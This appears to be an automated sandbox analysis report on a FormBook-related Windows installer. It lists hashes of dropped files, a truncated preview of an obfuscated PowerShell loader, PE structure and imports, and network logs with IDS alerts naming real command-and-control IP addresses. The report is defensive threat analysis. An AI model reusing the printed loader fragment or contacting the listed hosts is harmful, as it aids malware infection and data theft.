                                                                          Preview:......................j..h....!..............................................p.............c....P............................k......................................y...............o`....................}...'9...........................Gt......................P.............................................................'.................................#.......................!.............................................................................................W.....C..........................................................................U...g......................................H.....s............n........U........)..........................................s.........S.................t......................................M.................................................................................S.............................................................H........................).............c.$...... .....................n.....................................
                                                                          Process:C:\Users\user\Desktop\Forhandlingsfriheden.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):343664
                                                                          Entropy (8bit):7.533339783060515
                                                                          Encrypted:false
                                                                          SSDEEP:6144:0cYC0nYlwsin3/ZvpihJ3SYB4LpIuNfGaLuiSN+t8ZzgDq9/ldYRCXx1W8UHR9CX:/YC0nYlwsiQSC4Lu2uiS2AiRCXJgpc5v
                                                                          MD5:41325030CD022F8F0BCE765DACBACD27
                                                                          SHA1:27B44327536D1F4A60B07ACE2A105703A10F0C90
                                                                          SHA-256:4276231B1A4A5DCEB5907FEE8C5A274FF07FCADB310CCA4D3D4E64AC640F5322
                                                                          SHA-512:90F459BD0CECA6DEC84C63B6C30D1B78758F84E39E36FAA8712665F8AD79A851BBFECE2D689494FD06185F4686D8AADBD6DC06ED3279E8A58157E8685193EB76
                                                                          Malicious:false
                                                                          Preview:..aaaaa.(.O............Q.......................~~~.....t.``............---...............\.O...........jj..........................J.......................................W..........ss........J...........ll.......v.r............Z....=...9...;.OO....B............................A......\......................?.....H.....r...."....|.........Z......................F.....X.....................................UU..BB.x..k.__................4444.e..;..))..xxx....+...........^.....ee.........L.u........................................@@@................X....<..............................rr..5.......................g.................)))......W.......ii..;........R....{{{{...XXX.........++........................MMM..............BBBB..s.............MM......???.......................;........22.xx........0.......................}..Z......................................tt.WW....eee..........................bb...............................a..................ss....qqq.....33.ee.............+.bb...
                                                                          Process:C:\Users\user\Desktop\Forhandlingsfriheden.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):437071
                                                                          Entropy (8bit):1.253825384833456
                                                                          Encrypted:false
                                                                          SSDEEP:768:uWsvcxI4BCLNVp0kyRWlxp4pkE5sS+ZA4o7VengmxKgoMqbGam2C1afEUe/u41Az:2T4BC0SG4J+VB8GA2pzEszrq2GrwLnj
                                                                          MD5:F030199A57CDBFC5D06AC8BFB59059C3
                                                                          SHA1:3C7AA5EA48CBAA34C8426B76498CD4BF5BF644BF
                                                                          SHA-256:FD1253B138D560D3AD0A56C32F37D0FDBDE9E16CC37E59E991595C7349B1F087
                                                                          SHA-512:7EC5E2553A15923396B77E07685172CEEAFDE8F60CCBB97E0796DCB8E1BBA8FF17F1CA242B143AD497942FDC8D7473AEFB5091E6492616B3D8C0EBCBA13C98C2
                                                                          Malicious:false
                                                                          Preview:.....................................X....................................>..a......................A......w..............................@.y........K..............................................z...................z...........p............V.....................................................h....................|..U.........../................................................................O..+.............................................+................F....................................2......................J..........................".........................A.............................-..............G..............S...............V.............t.......=.....................b.............................................................................................................................................................w................3........f.................2.........................m.0.........................................q...............................
                                                                          Process:C:\Users\user\Desktop\Forhandlingsfriheden.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (4095), with CRLF, LF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):75355
                                                                          Entropy (8bit):5.122102914816226
                                                                          Encrypted:false
                                                                          SSDEEP:1536:1IUx2OzvrZQvT1wLKHp/z0GgK3unpu6IN9Dw7fOMLukpGoz4eg:1xzvlQr+WJ/z0GH3Wu6IN9fMLuexU
                                                                          MD5:CD980C6711B089FE9C1D4D13BAEC70C9
                                                                          SHA1:927E38F5C33BFC320AE78C2F893B30D208C2153C
                                                                          SHA-256:29E7FF5F03CCF993A459B938C2FB5AA267D8CE5B33A7CC78BCDA9AEADAB1BE6A
                                                                          SHA-512:898D775E30DD974F7E60879E375A0802558D9A867749C21B85A520E7001FB0B1F368379F095D087A72B9D1C467A319CD848CD1D128A06FE2B409E1A3512DB81B
                                                                          Malicious:true
                                                                          Preview:$Trudi=$ginsberg;........$Foreboard = @'.For rom. Hyoth,$Jawyc.dCForb,deh BegginaDisordeiBronch nAchatinoGaflensnVirkn,n= Sparta$ FiskesF Sab atrOd rantaVestkysfOverv jr Ptyalot RadioseG asbls;Commerc. epkyllf OrddeluBlaaklonMiszea cSortk dtBackingidetenteoBrachydnP,eferr LunersbL Linkedosprut lpPiquetbpfilm dkiBuckto,eEpopoeis ThickltSquadro Udlaane(Washupt$TinksmeUSoldyrkn Co kshaFigen acslagelzc BallasePoohsgesPowde es Subseni owelsbbKran jlldevolute SkeblanSmag sae SporotsFro tess studenaKlem inv Equicoelogaoedn AnalytiConsolatThrottle pseudo1Propiti4 adikal6.verhel,styring$KeepingKTariflnr TekstiaMu,quasfKopierit nyderti Desulfg Unthr,eMoringu)Femli g Testifi{Mervrdi.Ibenhol. Os.ren$LococinSmagnolimPhotocooAkkoladoBlokfuncAbidersh KitinssSubo aq Den,es(SkrdderC O isaca,stemndc UniveroU selfnz WincereOmslagsaGalgernlOmprioroUnder iuDorosacs Kln.di Abersfu'LavetstK Stone,l HayeteiKnobblypcirusesn Imm teiHjern snA vokat$BuckeroCHanefiyr CoarseeSkibsstnPerverteBakisumlS.gnsovsSrbeha
                                                                          Process:C:\Users\user\Desktop\Forhandlingsfriheden.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):484281
                                                                          Entropy (8bit):1.2585657408825282
                                                                          Encrypted:false
                                                                          SSDEEP:1536:ZtZbLcPMi2av+CVKljwe/ieUZ39FbMXVvL:PyPrdCBlotFbO
                                                                          MD5:A8740E0A6C72618AB3FB8804F4835BEF
                                                                          SHA1:6393CB3D9E3E670BA5C96F4A757F5B198196EB15
                                                                          SHA-256:EF5DB6A0097473B03CCF2A1E6152E2AC7AC57BB31B31A06529BCD3900E9C097C
                                                                          SHA-512:55740B7FE5A3D26FC47F9695B2FD33C045E67E6E36F0D2121235C2AEA9800F19740C1B0F797E32E8108E10245D8A4616308173E24A61129D82B9D60500C8763C
                                                                          Malicious:false
                                                                          Preview:.............................................................................[....2...........W......A.................S........y.................................................................4.......D...=...............Y......................".............................................................7............................................................................Y.....................................{........{.....>................m.....................................`...................................r...............................?.....#...............8.?.....................................................-..........\....................................................%:.................................p.................{.......r.............u..m...b...........................<.........................................................................1...............................................S.............................................4.............W....
                                                                          Process:C:\Users\user\Desktop\Forhandlingsfriheden.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):493903
                                                                          Entropy (8bit):1.2514017425028907
                                                                          Encrypted:false
                                                                          SSDEEP:1536:J5fAgVg2t2pObnNoCYrlANC4fcmCuJyzbffMxL+hJfryobV3Krqx1TJG:r/Bb+CYr2cbPiihhqUO
                                                                          MD5:8B4C2BBEDD252D6BB6DB679AB3723802
                                                                          SHA1:2D9775744675D3B32F3CA2FDF975C9293B719926
                                                                          SHA-256:9CCADD82A127BA29D7BA291CB307753D060CA26A3C3CCBCB9EDB3F3A38E5EE31
                                                                          SHA-512:7940E4CE5AB08DDFE4DB8B2676F9B92C51DC794C8772760C279B8BC57B7C97502ADBF91747D4FA57BAA6B5B695504E090875DF6890D478B8FD6CF8D70B3C8F65
                                                                          Malicious:false
                                                                          Preview:..Zy..........................................V......................k...................g........./.............Q.........l..#.....^............................................x..........&.............................../................................................................./............/.........................).......?......................p.............o..........................................sy............................................................5.........................R2...................................................................................................."e..............................................Y..................................................l.......{................s...............................................9..........................d.........&.......r......................<..........................................................................................................?............*..................L.................
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Category:dropped
                                                                          Size (bytes):801513
                                                                          Entropy (8bit):7.828311562814192
                                                                          Encrypted:false
                                                                          SSDEEP:12288:UXqlVfD6qDmRHs0I5FcOM0hHaYLVC61UrV4PRklT3we+doWVkeehow:UXqzrTDmBsRkLYLV24QT31V1how
                                                                          MD5:B149B18BE3FEC4CF93173C200384222C
                                                                          SHA1:F9E248A8612781C407537750D4CDD515798EDC34
                                                                          SHA-256:A1F2A8771D4075B694648EBB4CDD11BB2DB213A947F8D08D6DCA7A8710F651D7
                                                                          SHA-512:6DEC95032B50C615F05855F011AF726C35008AA259911E45D73E817102CE5E13C1F202FB80FA703E564C96822B13BD696D4B0CC5FF5F07DDDC1E0E11BA92BAAE
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 18%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".......5............@.......................................@..........................................................................................................................................................text...ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...0...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Entropy (8bit):7.828311562814192
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:Forhandlingsfriheden.exe
                                                                          File size:801'513 bytes
                                                                          MD5:b149b18be3fec4cf93173c200384222c
                                                                          SHA1:f9e248a8612781c407537750d4cdd515798edc34
                                                                          SHA256:a1f2a8771d4075b694648ebb4cdd11bb2db213a947f8d08d6dca7a8710f651d7
                                                                          SHA512:6dec95032b50c615f05855f011af726c35008aa259911e45d73e817102ce5e13c1f202fb80fa703e564c96822b13bd696d4b0cc5ff5f07dddc1e0e11ba92baae
                                                                          SSDEEP:12288:UXqlVfD6qDmRHs0I5FcOM0hHaYLVC61UrV4PRklT3we+doWVkeehow:UXqzrTDmBsRkLYLV24QT31V1how
                                                                          TLSH:250501917A50123FC16D417BB2AB2B75DBABDFA802775801A223FF0BB5357617E08943
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".....
                                                                          Icon Hash:71868ed4e8b04d49
                                                                          Entrypoint:0x40351c
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x660843F3 [Sat Mar 30 16:55:15 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                                          Instruction
                                                                          sub esp, 000003F8h
                                                                          push ebp
                                                                          push esi
                                                                          push edi
                                                                          push 00000020h
                                                                          pop edi
                                                                          xor ebp, ebp
                                                                          push 00008001h
                                                                          mov dword ptr [esp+20h], ebp
                                                                          mov dword ptr [esp+18h], 0040A2D8h
                                                                          mov dword ptr [esp+14h], ebp
                                                                          call dword ptr [004080A4h]
                                                                          mov esi, dword ptr [004080A8h]
                                                                          lea eax, dword ptr [esp+34h]
                                                                          push eax
                                                                          mov dword ptr [esp+4Ch], ebp
                                                                          mov dword ptr [esp+0000014Ch], ebp
                                                                          mov dword ptr [esp+00000150h], ebp
                                                                          mov dword ptr [esp+38h], 0000011Ch
                                                                          call esi
                                                                          test eax, eax
                                                                          jne 00007F22848CE0FAh
                                                                          lea eax, dword ptr [esp+34h]
                                                                          mov dword ptr [esp+34h], 00000114h
                                                                          push eax
                                                                          call esi
                                                                          mov ax, word ptr [esp+48h]
                                                                          mov ecx, dword ptr [esp+62h]
                                                                          sub ax, 00000053h
                                                                          add ecx, FFFFFFD0h
                                                                          neg ax
                                                                          sbb eax, eax
                                                                          mov byte ptr [esp+0000014Eh], 00000004h
                                                                          not eax
                                                                          and eax, ecx
                                                                          mov word ptr [esp+00000148h], ax
                                                                          cmp dword ptr [esp+38h], 0Ah
                                                                          jnc 00007F22848CE0C8h
                                                                          and word ptr [esp+42h], 0000h
                                                                          mov eax, dword ptr [esp+40h]
                                                                          movzx ecx, byte ptr [esp+3Ch]
                                                                          mov dword ptr [00429AD8h], eax
                                                                          xor eax, eax
                                                                          mov ah, byte ptr [esp+38h]
                                                                          movzx eax, ax
                                                                          or eax, ecx
                                                                          xor ecx, ecx
                                                                          mov ch, byte ptr [esp+00000148h]
                                                                          movzx ecx, cx
                                                                          shl eax, 10h
                                                                          or eax, ecx
                                                                          movzx ecx, byte ptr [esp+0000004Eh]
                                                                          Programming Language:
                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x4d0000x1f780.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x65760x66001e4066ed6e7440cc449c401dfd9ca64fFalse0.6663219975490197data6.461246686118911IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0xa0000x1fb380x6002e1d49b2855a89e6218e118f0c182b81False0.5026041666666666data4.044293204800279IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .ndata0x2a0000x230000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0x4d0000x1f7800x1f8008e8a3197e2686a2d1e03890bd5970dadFalse0.5309554811507936data6.149455977169068IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x4d2f80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.25881343901573406
                                                                          RT_ICON0x5db200x9f42PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9983811626195732
                                                                          RT_ICON0x67a680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.4413900414937759
                                                                          RT_ICON0x6a0100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.5112570356472795
                                                                          RT_ICON0x6b0b80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.6077868852459016
                                                                          RT_ICON0x6ba400x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.650709219858156
                                                                          RT_DIALOG0x6bea80x100dataEnglishUnited States0.5234375
                                                                          RT_DIALOG0x6bfa80x11cdataEnglishUnited States0.6056338028169014
                                                                          RT_DIALOG0x6c0c80xc4dataEnglishUnited States0.5918367346938775
                                                                          RT_DIALOG0x6c1900x60dataEnglishUnited States0.7291666666666666
                                                                          RT_GROUP_ICON0x6c1f00x5adataEnglishUnited States0.7888888888888889
                                                                          RT_VERSION0x6c2500x1f0MS Windows COFF PowerPC object fileEnglishUnited States0.5504032258064516
                                                                          RT_MANIFEST0x6c4400x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                          DLLImport
                                                                          ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                          SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                          ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                          COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                          USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                          GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                          KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States
                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-12-10T13:53:13.567218+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649850212.162.149.6680TCP
                                                                          2024-12-10T13:53:41.898306+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649915165.22.38.18580TCP
                                                                          2024-12-10T13:53:59.133846+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649954154.88.22.10480TCP
                                                                          2024-12-10T13:54:01.890375+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649961154.88.22.10480TCP
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 10, 2024 13:53:12.302031040 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:12.421711922 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:12.421797991 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:12.422146082 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:12.541621923 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.567116022 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.567136049 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.567148924 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.567159891 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.567173004 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.567218065 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.567261934 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.597273111 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.597295046 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.597306013 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.597373009 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.597491026 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.597502947 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.597547054 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.686558008 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.686639071 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.686750889 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.759238958 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.759284019 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.759321928 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.759342909 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.763366938 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.763408899 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.763427019 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.763459921 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.771884918 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.771933079 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.772008896 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.772054911 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.780687094 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.780749083 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.780802011 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.790256023 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.790316105 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.790368080 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.797250032 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.797347069 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.797378063 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.797430038 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.805150032 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.805217028 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.805264950 CET8049850212.162.149.66192.168.2.6
                                                                          Dec 10, 2024 13:53:13.805309057 CET4985080192.168.2.6212.162.149.66
                                                                          Dec 10, 2024 13:53:13.812408924 CET8049850212.162.149.66192.168.2.6
